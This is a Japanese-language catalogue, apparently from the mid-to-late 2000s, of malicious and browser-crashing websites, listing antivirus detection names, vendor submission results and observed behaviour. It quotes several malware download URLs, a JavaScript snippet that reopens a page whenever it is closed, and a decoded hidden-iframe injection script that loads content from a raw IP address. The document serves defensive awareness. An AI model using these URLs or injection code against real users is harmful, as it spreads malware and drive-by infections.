通し番号. | URL( 数字→アルファベット順 )
[確認日/掲載日] 鑑定結果/解説 |
← このようになっています。 |
[2007/02/22] | このファイルは相手サーバー非力のため、中々落ちてこない。
2007/02/09 にトレンドマイクロ社にファイルを提出。 今日、その結果の連絡があり、ウィルス名:TSPY_GOLDUN.HP として検出するよう対応、とのこと。 実際に 2007/02/09 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TSPY_GOLDUN.HP を検出することを確認。 2007/02/09 から今日まではファイルの置き換えは無いと推測される。 |
[2007/02/09] | ウィルス名:TROJ_AGENT.ICK |
[2007/02/22] | このファイルは相手サーバー非力のため、中々落ちてこない。
2007/02/09 にトレンドマイクロ社にファイルを提出。 今日、その結果の連絡があり、ウィルス名:TROJ_DELF.EQC として検出するよう対応、とのこと。 実際に 2007/02/09 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_DELF.EQC を検出することを確認。 2007/02/09 から今日まではファイルの置き換えは無いと推測される。 |
[2005/08/01] | こんな感じ のサイトだが、スパイウェア有り。一定時間間隔で何かを読み込んでいる。
このURLに関連している悪玉ファイルは以下。 //download.overpro.com/WildAppNonUS.cab ← ウィルス名:ADW_OVERPRO.A //mmm.media-motor.net/soft/default.exe ← ウィルス名:TROJ_VB.DF //www.addictivetechnologies.net/DM0/cab/oo7agfp.cab ← バスター無反応だが、トロイの木馬。 |
[2005/11/30] | ウィルス名:CHM_CODEBASE.AD |
[2005/08/07] | しきりに下のファイルをDLしろ、と催促してくる。
//www.20x2p.com/ee156382/enter.cab#Version=1,0,0,1 |
[2005/03/28] | ウィルス名:TROJ_SMALL.KQ |
[2005/03/28] | ウィルス名:TROJ_CWS.B |
[2006/07/19] | こんな感じ の画面だが、ウィルス名:JS_SPAWN.A を検出。 |
[2005/08/29] | 無限アラート。これ を閉じても閉じても表示する。強制終了で脱出。 |
[2005/09/02] | ブラクラ。無限にjavaアラートが出てくる。
JavaScriptオフにすると「新・2ちゃんねう」という掲示板を表示。 |
[2009/06/11] | ファイルサイズ:25.2 KB 。ウィルス名:PAK_GENERIC.001 |
[2009/06/11] | ファイルサイズ:14.0 KB 。ウィルス名:PAK_GENERIC.001 |
[2006/12/27] | ウィルス名:JAVA_BYTEVER.AD+JAVA_BYTEVER.BC+HTML_Generic.Z+EXPL_WMF.GEN
ソースを見ると、ほとんどがコード変換されていて、ウィルスサイトとしては意外と強力である。 |
[2007/01/12] | 2006/12/31 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_DLOADER.GRJ として検出するよう対応、とのこと。 実際に 2006/12/31 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_DLOADER.GRJ を検出することを確認。 2006/12/31 から今日まではファイルは置き換えられていないと推測される。 |
[2006/12/31] | ウィルス名:JAVA_BYTEVER.AD+JAVA_BYTEVER.BC |
[2006/12/31] | ウィルス名:HTML_Generic.Z |
[2006/12/27] | ウィルス名:EXPL_WMF.GEN |
[2007/04/08] | ウィルス名:CrackingApps_Keygen |
[2007/02/27] | 2007/02/11 にトレンドマイクロ社に中身の「KeyGen.exe」ファイルを提出。
2007/02/26 にその結果の連絡があり、ウィルス名:CRCK_KEYGEN.B として検出するよう対応、とのこと。 実際に 2007/02/11 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:CRCK_KEYGEN.B を検出することを確認。 2007/02/11 から今日まではファイルは置き換えられていないと推測される。 |
[2009/01/30] | やたらと長い名前の圧縮ファイルが落ちてくる。解凍すると「rd65documentos.com」ファイルが現れるが、ウィルス名:TROJ_DLOADER.TOG を検出。 |
[2010/03/21] | ファイルサイズ:38.5 KB 。ウィルス名:PAK_GENERIC.001 |
[2008/07/16] | ウィルス名:TSC_GENCLEAN+PAK_Generic.001 |
[2008/11/25] | ウィルス名:CRYP_MANGLED |
[2009/09/06] | ファイルサイズ:27.6 KB 。ウィルス名:TSPY_ONLINEG.NEW |
[2007/05/23] | 2007/04/06 にトレンドマイクロ社にファイルを提出。
2007/04/11 にその結果の連絡があり、ウィルス名:TROJ_DELF.EZW として検出するよう対応、とのこと。 2007/04/06 にDLしたファイルが手元に無いため、実際にウィルス検出対応したかどうかは未確認。 しかも、今日改めて当該URLを調べてみると、404 になっていた。 |
[2007/05/23] | 2007/04/06 にトレンドマイクロ社にファイルを提出。
2007/04/11 にその結果の連絡があり、ウィルス名:TROJ_DELF.EZW として検出するよう対応、とのこと。 2007/04/06 にDLしたファイルが手元に無いため、実際にウィルス検出対応したかどうかは未確認。 しかも、今日改めて当該URLを調べてみると、404 になっていた。 |
[2006/04/14] | ウィルス名:JAVA_BYTEVER.AQ+JAVA_BYTEVER.S |
[2006/04/14] | 1回目の確認では、「xpl35.wmf」をDLしろ、と言ってきてウィルス名:EXPL_WMF.GEN+TROJ_NASCENE.D を検出。
その後、ウィルス名:JS_ONLOADXPLT.A+JAVA_BYTEVER.A+JAVA_BYTEVER.C+JAVA_BYTEVER.AQ+JAVA_BYTEVER.S を検出。 2回目以降の確認では、//1-extreme.biz/ に飛び、この画面 を表示。 |
[2006/04/14] | ウィルス名:EXPL_WMF.GEN+TROJ_NASCENE.D |
[2008/08/27] | ウィルス名:TSC_GENCLEAN+TROJ_AGENT.AWRZ |
[2008/10/04] | リネージュ2のFlashの脆弱性を狙ったアカウントハックウィルスが存在する可能性があるらしい。 |
[2006/07/17] | こんな感じ のページだが、閉じても閉じても復活する。 |
[2006/07/17] | 他の方の結果は以下。
「ページが閉じても閉じても復活し続けます。PCに大きな害は無いですが軽いブラクラです。」 「ページにこんな記述がある。 ↓ <SCRIPT language=JavaScript> var leave=true; function Leave() {if (leave) open("oppaiforever.htm");} </SCRIPT> つまりページを閉じるとoppaiforever.htmを開くという仕様。 なお、ブラウザや環境設定次第ではこの手のスクリプトは何の効果もない。」 |
[2009/01/18] | ウィルス名:TROJ_PACKED.GBW |
[2009/01/24] | ウィルス名:TROJ_AGENT.AIFN として対応済。 |
[2009/01/18] | ウィルス名:TROJ_PACKED.GBW |
[2009/01/18] | ウィルス名:TROJ_DROPPER.EOG |
[2009/01/18] | ウィルス名:TROJ_DLOADER.PDC |
[2009/01/18] | ウィルス名:TSPY_UPACK.D |
[2009/01/18] | ウィルス名:WORM_DLOADER.TCG |
[2009/01/18] | ウィルス名:TROJ_GAMETHI.BWO |
[2009/01/18] | ウィルス名:TROJ_PACKED.GBW |
[2009/01/18] | ウィルス名:WORM_JALOUS.AI |
[2007/01/10] | 直踏みでは「ParisVoyeur.exe」なるファイルが落ちてくる。
2006/12/10 にトレンドマイクロ社にファイルを提出。 2006/12/28 にその結果の連絡があり、ウィルス名:DIAL_BAUY.A として検出するよう対応、とのこと。 実際に 2006/12/10 にDLしたファイルからウィルス名:DIAL_BAUY.A を検出することを確認。 しかし、2006/12/28 に再度DLしたファイル、今日改めてDLしたファイルにはバスター無反応。 2006/12/10 から 2006/12/28 までの間にファイルの置き換えがあったと思われる。 |
[2007/01/19] | 2007/01/13 にトレンドマイクロ社に「ParisVoyeur.exe」ファイルを再提出。
今日、その結果の連絡があり、ウィルス名:DIAL_BCBW.A として検出するよう対応、とのこと。 実際に 2007/01/13 にDLしたファイルからウィルス名:DIAL_BCBW.A を検出することを確認。 しかし、今日改めてDLしたファイルにはバスター無反応。 2007/01/13 から今日までの間にファイルの置き換えがあったと思われる。 |
[2007/01/10] | 2006/12/10 にトレンドマイクロ社にファイルを提出。
2006/12/28 にその結果の連絡があり、ウィルス名:DIAL_AJSG.AQ として検出するよう対応、とのこと。 実際に 2006/12/10 にDLしたファイルからウィルス名:DIAL_AJSG.AQ を検出することを確認。 しかし、2006/12/28 に再度DLしたファイル、今日改めてDLしたファイルにはバスター無反応。 2006/12/10 から 2006/12/28 までの間にファイルの置き換えがあったと思われる。 |
[2007/01/19] | 2007/01/13 にトレンドマイクロ社にファイルを再提出。
今日、その結果の連絡があり、ウィルス名:DIAL_AJSG.AO として検出するよう対応、とのこと。 実際に 2007/01/13 にDLしたファイルからウィルス名:DIAL_AJSG.AO を検出することを確認。 しかし、今日改めてDLしたファイルにはバスター無反応。 2007/01/13 から今日までの間にファイルの置き換えがあったと思われる。 |
[2007/02/01] | 直踏みでは「ParisVoyeur.exe」なるファイルが落ちてくる。
2007/01/20 にトレンドマイクロ社にファイルを提出。 2007/01/25 にその連絡があり、ウィルス名:DIAL_CDDIAL.FE として検出するよう対応、とのこと。 2007/01/20 にDLしたファイルからはウィルス名:DIAL_CDDIAL.FE を検出するが、今日、改めて当該URLからDLしてみるとバスター無反応。 恐らく、新しいファイルに随時置き換えられるURLと推測される。 |
[2007/02/14] | 再度、2007/02/04 に「ParisVoyeur.exe」ファイルをDLしてトレンドマイクロ社に提出。
今日、その結果の連絡があり、ウィルス名:DIAL_CDDIAL.HE として検出するよう対応、とのこと。 実際に 2007/02/04 にDLしたファイルからウィルス名:DIAL_CDDIAL.HE を検出することを確認。 しかし、今日改めて当該URLからDLしてみるとバスター無反応。 恐らく、2007/02/04 から今日までの間にファイルの置き換えがあったと推測される。 |
[2006/08/14] | 2006/08/09 にトレンドマイクロ社にファイルを提出。
今日、その連絡があり、ウィルス名:DIAL_CDDIAL.AL として検出するよう対応、とのこと。 2006/08/09 にDLしたファイルからはウィルス名:DIAL_CDDIAL.AL を検出するが、今日、改めて当該URLからDLしてみるとバスター無反応。 恐らく、新しいファイルに随時置き換えられるURLと推測される。 |
[2006/10/01] | 2006/09/16 にトレンドマイクロ社にファイルを再提出。
2006/09/28 にその結果の連絡があり、ウィルス名:DIAL_CDDIAL.AX として検出するよう対応、とのこと。 2006/09/16 にDLしたファイルからウィルス名:DIAL_CDDIAL.AX を検出することを確認。 しかし、今日改めて当該URLからDLしてみるとバスター無反応。 |
[2007/05/20] | ウィルス名:TROJ_STRATION.GL |
[2006/10/01] | 2006/09/16 にトレンドマイクロ社にファイルを提出。
2006/09/28 にその結果の連絡があり、ウィルス名:DIAL_CDDIAL.AX として検出するよう対応、とのこと。 2006/09/16 にDLしたファイルからウィルス名:DIAL_CDDIAL.AX を検出することを確認。 しかし、今日改めて当該URLからDLしてみるとバスター無反応。 恐らく、新しいファイルに随時置き換えられるURLと推測される。 |
[2005/08/02] | スパイウェアサイト。踏むと こんな感じ 。
このダイアログ を表示し、拒否するとウィルス名:ADW_123MANIA.Aを検出。 再び このダイアログ を表示。拒否すると今度はウィルス名:ADW_SIPSPI.Aを検出すると同時に この小窓 を表示。この小窓は他にも種類がある。 そして再び このダイアログ を表示、の繰り返しだが、もう一回繰り返して症状は終わった。 それは以下の2つのURLを読み込むために起きる。 //www.123mania.com/_popups/popupsalida.asp //www.123mania.com/_popups/popunder.asp 元の これ を閉じると これ を新窓表示して再びダイアログ→ウィルス検出、の繰り返し。 これ は普通に閉じれるが、この小窓も他に種類がある。 |
[2006/07/18] | ウィルス名:ADW_123MANIA.A |
[2006/07/18] | ウィルス名:ADW_SIPSPI.A |
[2007/05/28] | 踏むと以下のURLから「file.exe」なるファイルが落ちてくるが、ウィルス名:TROJ_STRATION.IH を検出。 //1263.xedatrinmderuns.com/m11/file.exe |
[2007/05/28] | ウィルス名:TROJ_STRATION.IH |
[2008/11/17] | ウィルス名:DIAL_SAPIR.A |
[2009/05/18] | ファイルサイズ:120 KB 。バスター無反応だが、他社製ウィルス駆除ソフトによっては反応がある。 |
[2009/05/18] | ファイルサイズ:40.0 KB 。バスター無反応だが、他社製ウィルス駆除ソフトによっては反応がある。 |
[2009/05/18] | ファイルサイズ:120 KB 。DOSプログラムである。
バスター無反応だが、他社製ウィルス駆除ソフトによっては反応がある。 |
[2009/05/18] | ファイルサイズ:40.0 KB 。DOSプログラムである。
バスター無反応だが、他社製ウィルス駆除ソフトによっては反応がある。 |
[2007/04/15] | 海外サイト。バスター無反応だが、他社製ウィルス駆除ソフトではウィルス反応がある。 |
[2006/10/01] | 2006/09/16 にトレンドマイクロ社にファイルを提出。
2006/09/28 にその結果の連絡があり、ウィルス名:DIAL_CDDIAL.AX として検出するよう対応、とのこと。 2006/09/16 にDLしたファイルからウィルス名:DIAL_CDDIAL.AX を検出することを確認。 しかし、今日改めて当該URLからDLしてみるとバスター無反応。 恐らく、新しいファイルに随時置き換えられるURLと推測される。 |
[2006/11/09] | 2006/11/05 にトレンドマイクロ社にファイルを再提出。
今日、その結果の連絡があり、ウィルス名:DIAL_CDDIAL.AV として検出するよう対応、とのこと。 実際に 2006/11/05 にDLしたファイルからウィルス名:DIAL_CDDIAL.AV を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_CDDIAL.AV を検出することを確認。 |
[2006/08/14] | 2006/08/08 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:DIAL_CDDIAL.AL として検出するよう対応したとのこと。 2006/08/08 にDLしたファイルからウィルス名:DIAL_CDDIAL.AL を検出することを確認。 しかし、改めて当該URLからDLしてみるとバスター無反応。 恐らく、新しいファイルに随時置き換えられるURLと推測される。 |
[2006/08/14] | 2006/08/08 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:DIAL_CDDIAL.AL として検出するよう対応したとのこと。 2006/08/08 にDLしたファイルからウィルス名:DIAL_CDDIAL.AL を検出することを確認。 しかし、改めて当該URLからDLしてみるとバスター無反応。 恐らく、新しいファイルに随時置き換えられるURLと推測される。 |
[2006/05/06] | こんな感じ のサイトだが、ウィルス名:VBS_REDLOF.A-1 を検出。 |
[2006/06/05] | 他の方の結果は以下の「」内。
「MHE同盟というデスノートのファンサイトでした。第76話の「挨拶」に関する話限定っぽいです。ただし、このサイトからVBS:Redlofを検出しました。」 |
[2006/06/05] | 「URLでぐぐると、ブラクラ鑑定サイトの鑑定結果が見つかります。
>危険!HTML.Redlof.Aを発見! (1) >危険!JS_PSYME.Vを発見! (1) >ウイルス入り。PC激しく有害。超危険。絶対踏むな。 踏んでみました。VBS/Redlof.M virusConnection terminated NOD32ウィルス検出。」 |
[2006/07/01] | 「MHE同盟というサイト。「当サイトは2005年wj39号デスノートpage.76「挨拶」でメロとハルの関係はエロすぎだとおもった人のための同盟です。」ですが VBS.Redlof.A が検出されました。
全ドライブ上の .html、.htm、.asp、.php、.jsp、.vbs ファイルに感染する VBスクリプトで書かれた(暗号化された)ポリモーフィックウイルスです。(Symantecサイトより)」 |
[2004/08/15] | ウィルス名:JAVA_BYTEVER.A+JAVA_STARTPAGE.D |
[2004/08/15] | ウィルス名:JAVA_BYTEVER.A |
[2004/08/15] | ウィルス名:JAVA_BYTEVER.A+JAVA_STARTPAGE.D |
[2004/08/15] | ウィルス名:JAVA_BYTEVER.A |
[2004/08/15] | ウィルス名:JAVA_BYTEVER.A+JAVA_SHIWOW.A |
[2004/08/15] | ウィルス名:JAVA_BYTEVER.A |
[2006/06/17] | 踏むと真っ白なページでバスター無反応だが、アンチウィルスソフトによっては反応すると思われる。 |
[2006/01/13] | ウィルス名:TROJ_NASCENE.Y+EXPL_WMF.GEN |
[2006/01/12] | ウィルス名:EXPL_WMF.GEN+TROJ_NASCENE.Y |
[2006/01/13] | マカフィーではウィルス名:Exploit-WMF を検出するらしい。 |
[2006/02/03] | ウィルス名:EXPL_WMF.GEN+TROJ_NASCENE.Y |
[2006/02/06] | 他の方の結果では「Kaspersky反応あり。Exploit.Win32.IMG-WMF 検出。 IrfanViewが起動しました。有害コードを実行しようとしたようです。wmfの脆弱性を狙ったウイルスのようです。」 |
[2006/01/12] | ウィルス名:EXPL_WMF.GEN+TROJ_NASCENE.Y
Location ヘッダで、//1800-search.com/as.wmfに飛ぶ。 |
[2006/01/13] | 再確認。//1800-search.com/22.wmf に飛ぶように変更されている。
ウィルス名:TROJ_NASCENE.Y+EXPL_WMF.GEN |
[2006/01/22] | 他の方の結果は以下の「」内。
「踏んだところ、FAX画像ビューワを突然開く挙動を確認しました。」 |
[2007/01/16] | 2006/12/28 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_DLOADER.FVN として検出するよう対応、とのこと。 実際に 2006/12/28 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_DLOADER.FVN を検出することを確認。 2006/12/28 から今日までのファイルの置き換えは無いと推測される。 |
[2007/02/22] | 2007/02/09 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_DLOADER.FHX として検出するよう対応、とのこと。 実際に 2007/02/09 にDLしたファイルからウィルス名:TROJ_DLOADER.FHX を検出することを確認。 しかし、今日改めて当該URLからDLしてみるとバスター無反応。 2007/02/09 から今日までの間にファイルの置き換えがあったと推測される。 |
[2007/05/23] | 2007/04/06 にトレンドマイクロ社にファイルを提出。
2007/04/11 にその結果の連絡があり、ウィルス名:TROJ_DELF.FTK として検出するよう対応、とのこと。 2007/04/06 にDLしたファイルが手元に無いため、実際にウィルス検出対応したかどうかは未確認。 しかも、今日改めて当該URLを調べてみると、404 になっていた。 |
[2005/07/15] | 海外アダルトサイト。ウィルス名:JS_MHTREDIR.P+JAVA_BYTEVER.A
20秒くらいして以下の 1. を新窓表示してウィルス名:JAVA_BYTEVER.Aを検出。1. は普通に閉じれる。 元の//18yofuck.info/?easypic.orgを閉じると以下の 2. を表示してウィルス名:JAVA_BYTEVER.Aを検出。
|
[2008/11/22] | 偽装ウィルス駆除ソフトのページに飛ぶ。 |
[2009/01/18] | ウィルス名:PAK_GENERIC.001 |
[2009/03/15] | 拡張子不明のファイルが落ちてくる。ファイルサイズ:88 KB 。バスター無反応だが、他社製ウィルス駆除ソフトによっては反応する。 |
[2008/12/11] | ウィルス名:TROJ_EXCHANGE.E |
[2010/03/23] | ファイルサイズ:2.99 KB 。高い確率で悪意あるファイルと判断。 |
[2005/05/12] | 解凍すると「GM51.exe」ファイルが出来るがウィルス名:TROJ_GMAIL.51を検出。
しかし、他のファイルへの感染活動は行なわず、ファイル(一時ファイル等含む)の削除で終わり。 |
[2004/10/05] | 無限JavaScript。FDDアタック。 |
[2008/09/06] | ウィルス名:TSC_GENCLEAN+PAK_Generic.005 |
[2008/09/15] | 2008/09/07 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:ADW_CINMUSACC として検出するよう対応、とのこと。 実際に 2008/09/07 にDLしたファイルからウィルス名:ADW_CINMUSACC を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:ADW_CINMUSACC を検出することを確認。 2008/09/07 から今日までのファイルの置き換えは無い、と推測される。 |
[2008/09/06] | ウィルス名:TSC_GENCLEAN+PAK_Generic.005 |
[2008/09/15] | 2008/09/07 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、その結果は「弊社としては正常ファイルとして判断したファイルであり、対応は行わない。」とのこと。 しかし、他の多くのウィルス駆除ソフトでは以下のように反応するようなので要注意。 AntiVir → DR/BHO.cst.44 Avast → Win32:BHO-GG AVG → Puper.H BitDefender → Dropped:Adware.Sogou.Gen DrWeb → Adware.Sogou.127 F-Secure → W32/NetworkWorm Fortinet → Adware/AdClicker GData 19 → Win32:Trojan-gen Ikarus → Virus.Win32.BHO.GG K7AntiVirus → not-a-virus:AdWare.Win32.Baidu Kaspersky → not-a-virus:AdWare.Win32.BHO.cst Microsoft → Program:Win32/Sogou NOD32v2 → Win32/Adware.Cinmus Norman → NetworkWorm.EQD Panda → Spyware/AdClicker PCTools → Trojan-Downloader.Agent.AEN Sophos → Troj/AdClick-ER Sunbelt → AdWare.Win32.BHO.cst Symantec → Adware.CPush TheHacker → Adware/BHO.ase TrendMicro → TROJ_ADCLICK.CI VBA32 → AdWare.Win32.BHO.cst ViRobot → Adware.BHO.137437.A Webwasher-Gateway → Trojan.Dropper.BHO.cst.44 |
[2008/09/06] | ウィルス名:TSC_GENCLEAN+PAK_Generic.001 |
[2008/09/06] | ウィルス名:TSC_GENCLEAN+PAK_Generic.005 |
[2008/09/06] | ウィルス名:TSC_GENCLEAN+TROJ_NSIS.AL |
[2005/02/06] | //cfi.hyo-ka.net/kiki01.htmに飛ぶ。 |
[2006/08/06] | ウィルス名:TROJ_DELF.WG |
[2007/03/12] | ウィルス名:JS_GENERIC |
[2007/01/16] | 2006/12/28 にトレンドマイクロ社に上記3つのファイルを提出。
今日、その結果の連絡があり、3つのファイルともウィルス名:TROJ_BANLOAD.BPV として検出するよう対応、とのこと。 実際に 2006/12/28 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_BANLOAD.BPV を検出することを確認。 2006/12/28 から今日までのファイルの置き換えは無いと推測される。 |
[2009/01/15] | ウィルス名:CRYP_XED-6 |
[2004/12/04] | ウィルス名:TROJ_FAVADD.D
お気に入りに加えようとしてくる。別窓で//crackspider.net/を表示。 |
[2006/10/21] | 2006/10/11 にトレンドマイクロ社に落ちてきた「ParisVoyeur.exe」ファイルを提出。
2006/10/13 にその結果の連絡があり、ウィルス名:DIAL_CDDIAL.AJ として検出するよう対応、とのこと。 実際に 2006/10/11 にDLしたファイルからウィルス名:DIAL_CDDIAL.AJ を検出することを確認。 しかし、今日改めて当該URLからDLしてみるとバスター無反応。 新しいファイルに置き換えられているものと推測される。 |
[2008/10/06] | 真っ白なページで、何かを呼び出している形跡がある。
バスター無反応だが、他社製ウィルス駆除ソフトでは反応があると思われる。 |
[2008/10/06] | ウィルス名:JS_DLOADER.YUD 。真っ白なページで、何かを呼び出している形跡がある。 |
[2008/10/06] | DL+解凍すると「UUSeeMediaCenter.exe」なるファイルが現れるが、ウィルス名:TROJ_ZLOB.AKT を検出。 |
[2008/10/26] | ウィルス名:PAK_GENERIC.001 |
[2008/10/26] | ウィルス名:TROJ_SMALL.LGU |
[2008/10/26] | ウィルス名:TROJ_SMALL.LGU |
[2008/10/26] | ウィルス名:PAK_GENERIC.001 |
[2008/10/26] | ウィルス名:PAK_GENERIC.001 |
[2009/01/18] | ウィルス名:WORM_JALOUS.AI |
[2009/01/18] | ウィルス名:HKTL_DUCKY |
[2009/01/18] | ウィルス名:TROJ_SHEUR.ARR |
[2009/01/18] | ウィルス名:TROJ_PACKED.CHI |
[2009/01/18] | ウィルス名:TSPY_ONLINEG.AIX |
[2009/01/18] | ウィルス名:TSPY_UPACK.D |
[2009/01/18] | ウィルス名:TROJ_ADCLICKE.HA |
[2009/01/18] | ウィルス名:WORM_DLOADER.TCG |
[2009/01/18] | ウィルス名:TSPY_ONLINEG.MDX |
[2008/10/06] | 真っ白なページで、何かを呼び出している形跡がある。
バスター無反応だが、他社製ウィルス駆除ソフトでは反応があると思われる。 |
[2008/10/06] | こんな感じ のページ。よく見ると、左上のほうに何かを2つ呼び出している形跡がある。
バスター無反応だが、他社製ウィルス駆除ソフトでは反応があると思われる。 |
[2006/06/01] | ウィルス名:TROJ_NASCENE.Y+EXPL_WMF.GEN |
[2006/08/24] | 2006/08/16 にトレンドマイクロ社にファイルを提出。
今日、連絡があり、ウィルス名:DIAL_RAS.HF として検出するよう対応した、とのこと。 2006/08/16 にDLしたファイルからウィルス名:DIAL_RAS.HF を検出することを確認。 今日、改めてDLしてみてもウィルス名:DIAL_RAS.HF を検出することを確認。 |
[2005/12/05] | 踏むと海外アダルトサイト。少し経ってからウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.ACを検出。
また、20〜30秒ごとにいろいろなアダルトサイトを1枚づつ表示していく模様。それらのURLは以下。放っておけば もっと表示すると思われる。 //www.lolitapost.biz/ //hot-images.net/?22pics.com //www.teensexyfree.com/ //www.theporntoplist.com/?i=463 ↑ これは、スクリプトタグで//www.22pics.com/out.phpを呼んでいることが原因と思われる。 また、//22pics.com/にはソースの中に以下のようにコード変換されている部分がある。 %64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68 %74%74%70%3a%2f%2f%38%35%2e%32%35%35%2e%31%31%33%2e%32%34%32%2f%61%64%76%2f%30%34%37%2f %20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b ↑ これを復号化すると、以下のようなスクリプトが現れる。 ↓ document.write('<iframe src=http://85.255.113.242/adv/047/ width=1 height=1></iframe>'); |
[2005/12/05] | 他の方の結果では、
「Kaspersky Anti-Virus でウィルス反応あり Trojan-Downloader.JS.Phel.d. 検出。」 |
[2006/01/20] | 改めて確認。海外アダルトサイトを表示するが、以下のウィルスを検出。「xpl.wmf」ファイルも落ちてくる。
ウィルス名:EXPL_WMF.GEN+TROJ_NASCENE.Y+TROJ_ANICMOO.X+JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC ソースを見るとコード変換された部分がある。そこに以下のURLが隠れている。 //game4all.biz/adv/120/new.php |
[2006/02/04] | 他の方の結果では「Kaspersky反応あり。Trojan-Downloader.JS.Agent.i 検出。」 |
[2005/12/07] | 踏むと こんな感じ のサイトだが、ウィルス名:JS_ONLOADXPLT.Aを検出。その後、IEが落ちる。
ソースチェッカーにかけてみると、何度やってもソース取得不可になる。 view-source: を付けてソースを直接取得しようとしても、ウィルス名:JS_ONLOADXPLT.Aを検出する。 |
[2005/12/07] | 踏むと こんな感じ のサイトだが、ウィルス名:JS_WINDEXP.Aを検出。
それと、これ も表示する。 ソースチェッカーにかけてみると、何度やってもソース取得不可になる。 view-source: を付けてソースを直接取得しようとしても、ウィルス名:JS_WINDEXP.Aを検出する。 |
[2005/12/07] | 踏むと こんな感じ のサイトだが、ウィルス名:JS_WINDEXP.A+JS_ONLOADXPLT.Aを検出。
それと、これ も表示する。その後、IEが落ちる。 ソースチェッカーにかけてみると、何度やってもソース取得不可になる。 view-source: を付けてソースを直接取得してソースを見ると、少々イヤな感じがするので、注意。 |
[2006/10/01] | 2006/09/16 にトレンドマイクロ社にファイルを提出。
2006/09/28 にその結果の連絡があり、ウィルス名:DIAL_CDDIAL.AX として検出するよう対応、とのこと。 2006/09/16 にDLしたファイルからウィルス名:DIAL_CDDIAL.AX を検出することを確認。 しかし、今日改めて当該URLからDLしてみるとバスター無反応。 恐らく、新しいファイルに随時置き換えられるURLと推測される。 |
[2004/11/12] | ウィルス名:JS_DIALOGARG.A |
[2005/10/03] | TELNETストーム。 |
[2004/04/03] | ウィルス名:JS.Trojan.WindowBomb
//www2.strangeworld.org/uedakana/sahra6147.jpgに飛ぶ。 |
[2009/11/08] | FDDアタックというタイトルのサイト。
まず、これ を2枚表示する。「OK」を押すと これ の無限アラート表示。 全体的には こんな感じ のサイト。タスクの強制終了で脱出可。 |
[2009/11/10] | 改めて確認。直打ちで行くと、何度確認してもフリーズし、IEの応答が無くなる。
[2009/11/08]確認時と挙動が違う。ソースが変更されている模様。 |
[2005/08/01] | Happy99をブラクラ並みにダウンロードする。
Happy99 はウィルス名:WORM_SKA.A。 このサイトはIFRAMEタグを大量に使い、以下のexeを落としてくる。 //easyweb.easynet.co.uk/~hiros/virii99/newtype/Happy99.exe |
[2005/08/01] | 大量のワームをIEtempフォルダに強制的に落とされる。 |
[2005/10/31] | 他の方の結果は「何かを落とそうとするダイアログが無限に開きます。」 |
[2005/11/06] | 他の方の結果は以下。
「ソースを見ると「win16.zip」と言うファイルを大量に落としてくるようです。ソースチェッカー曰く、ここは危険アドレスのひとつらしいです。」 |
[2005/08/06] | ウィルス名:JS_SPAWN.A 。//raus.de/crashme の赤ニコチャンバージョンのよう。 |
[2006/01/30] | 他の方の結果は以下の「」内。
「ウィンドウがいっぱい開いて、消そうとしてもまたたくさん開く…という感じの迷惑なページです。ウィルスでは無いようです。」 |
[2009/01/16] | 真っ白なページだが、ウィルス名:MAL_HIFRM を検出。
このサイトは、'Microsoft Corporation'からの'Remote Data Services Data Control'アドオンを実行しようとしている。 |
[2009/09/06] | ウィルス名:TROJ_GENERIC.DIT |
[2004/09/12] | //ssearch.biz/の解説を参照。 |
[2007/01/23] | 2006/12/17 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:DIAL_AJSG.AD として検出するよう対応、とのこと。 実際に 2006/12/17 にDLしたファイルからウィルス名:DIAL_AJSG.AD を検出することを確認。 しかし、今日改めて当該URLからDLしてみるとバスター無反応。 2006/12/17 から今日までの間にファイルの置き換えがあったと推測される。 |
[2008/07/15] | ウィルス名:PAK_Generic.006 |
[2009/12/27] | ファイルサイズ:192 KB 。いくつかのウィルス駆除ソフトで反応がある。不正なプログラムの一種と思われる。 |
[2008/08/27] | ウィルス名:TSC_GENCLEAN+TROJ_FAKEAV.FP |
[2008/08/27] | ウィルス名:TSC_GENCLEAN+TROJ_AGENT.AWRZ |
[2009/12/27] | ファイルサイズ:123 KB 。以下の2つのファイルが含まれている。それぞれ以下のように反応。
「acpidisk.sys」← ウィルス名:RTKT_CINMUS.SME 「dosss11.dll」← ウィルス名:TROJ_CINMUS.SMJ |
[2009/12/27] | ファイルサイズ:134 KB 。以下の2つのファイルが含まれている。それぞれ以下のように反応。
「acpidisk.sys」← ウィルス名:RTKT_CINMUS.SME 「dosss11.dll」← ウィルス名:TROJ_CINMENS.HG |
[2009/12/27] | ファイルサイズ:46.4 KB 。ウィルス名:TROJ_CINMUS.SME |
[2006/08/07] | 他の方の結果は以下の「」内。
「crashme crimsonというページです。IEを開くとウィンドウが動きまわり、なかなか閉じられません。 やっとこさ閉じると小さいウィンドウがたくさん現れ画面上を動き回ります。 その小さいウィンドウを閉じるとさらに大量増殖してしまいます。 タスクマネージャで終了させられますが数が開いてしまっていると処理に時間が掛かります。 ちなみにFireFoxではこのブラクラは動きませんでした。」 |
[2005/04/28] | 踏むと こんな感じ のサイト。
ウィルス名:JS_PSYME.AFを検出。//www.googkle.com/と同じ現象を確認。 |
[2006/02/26] | こんな感じ のサイト。バスター無反応だが、他アンチウィルスソフトでは反応があるらしい。
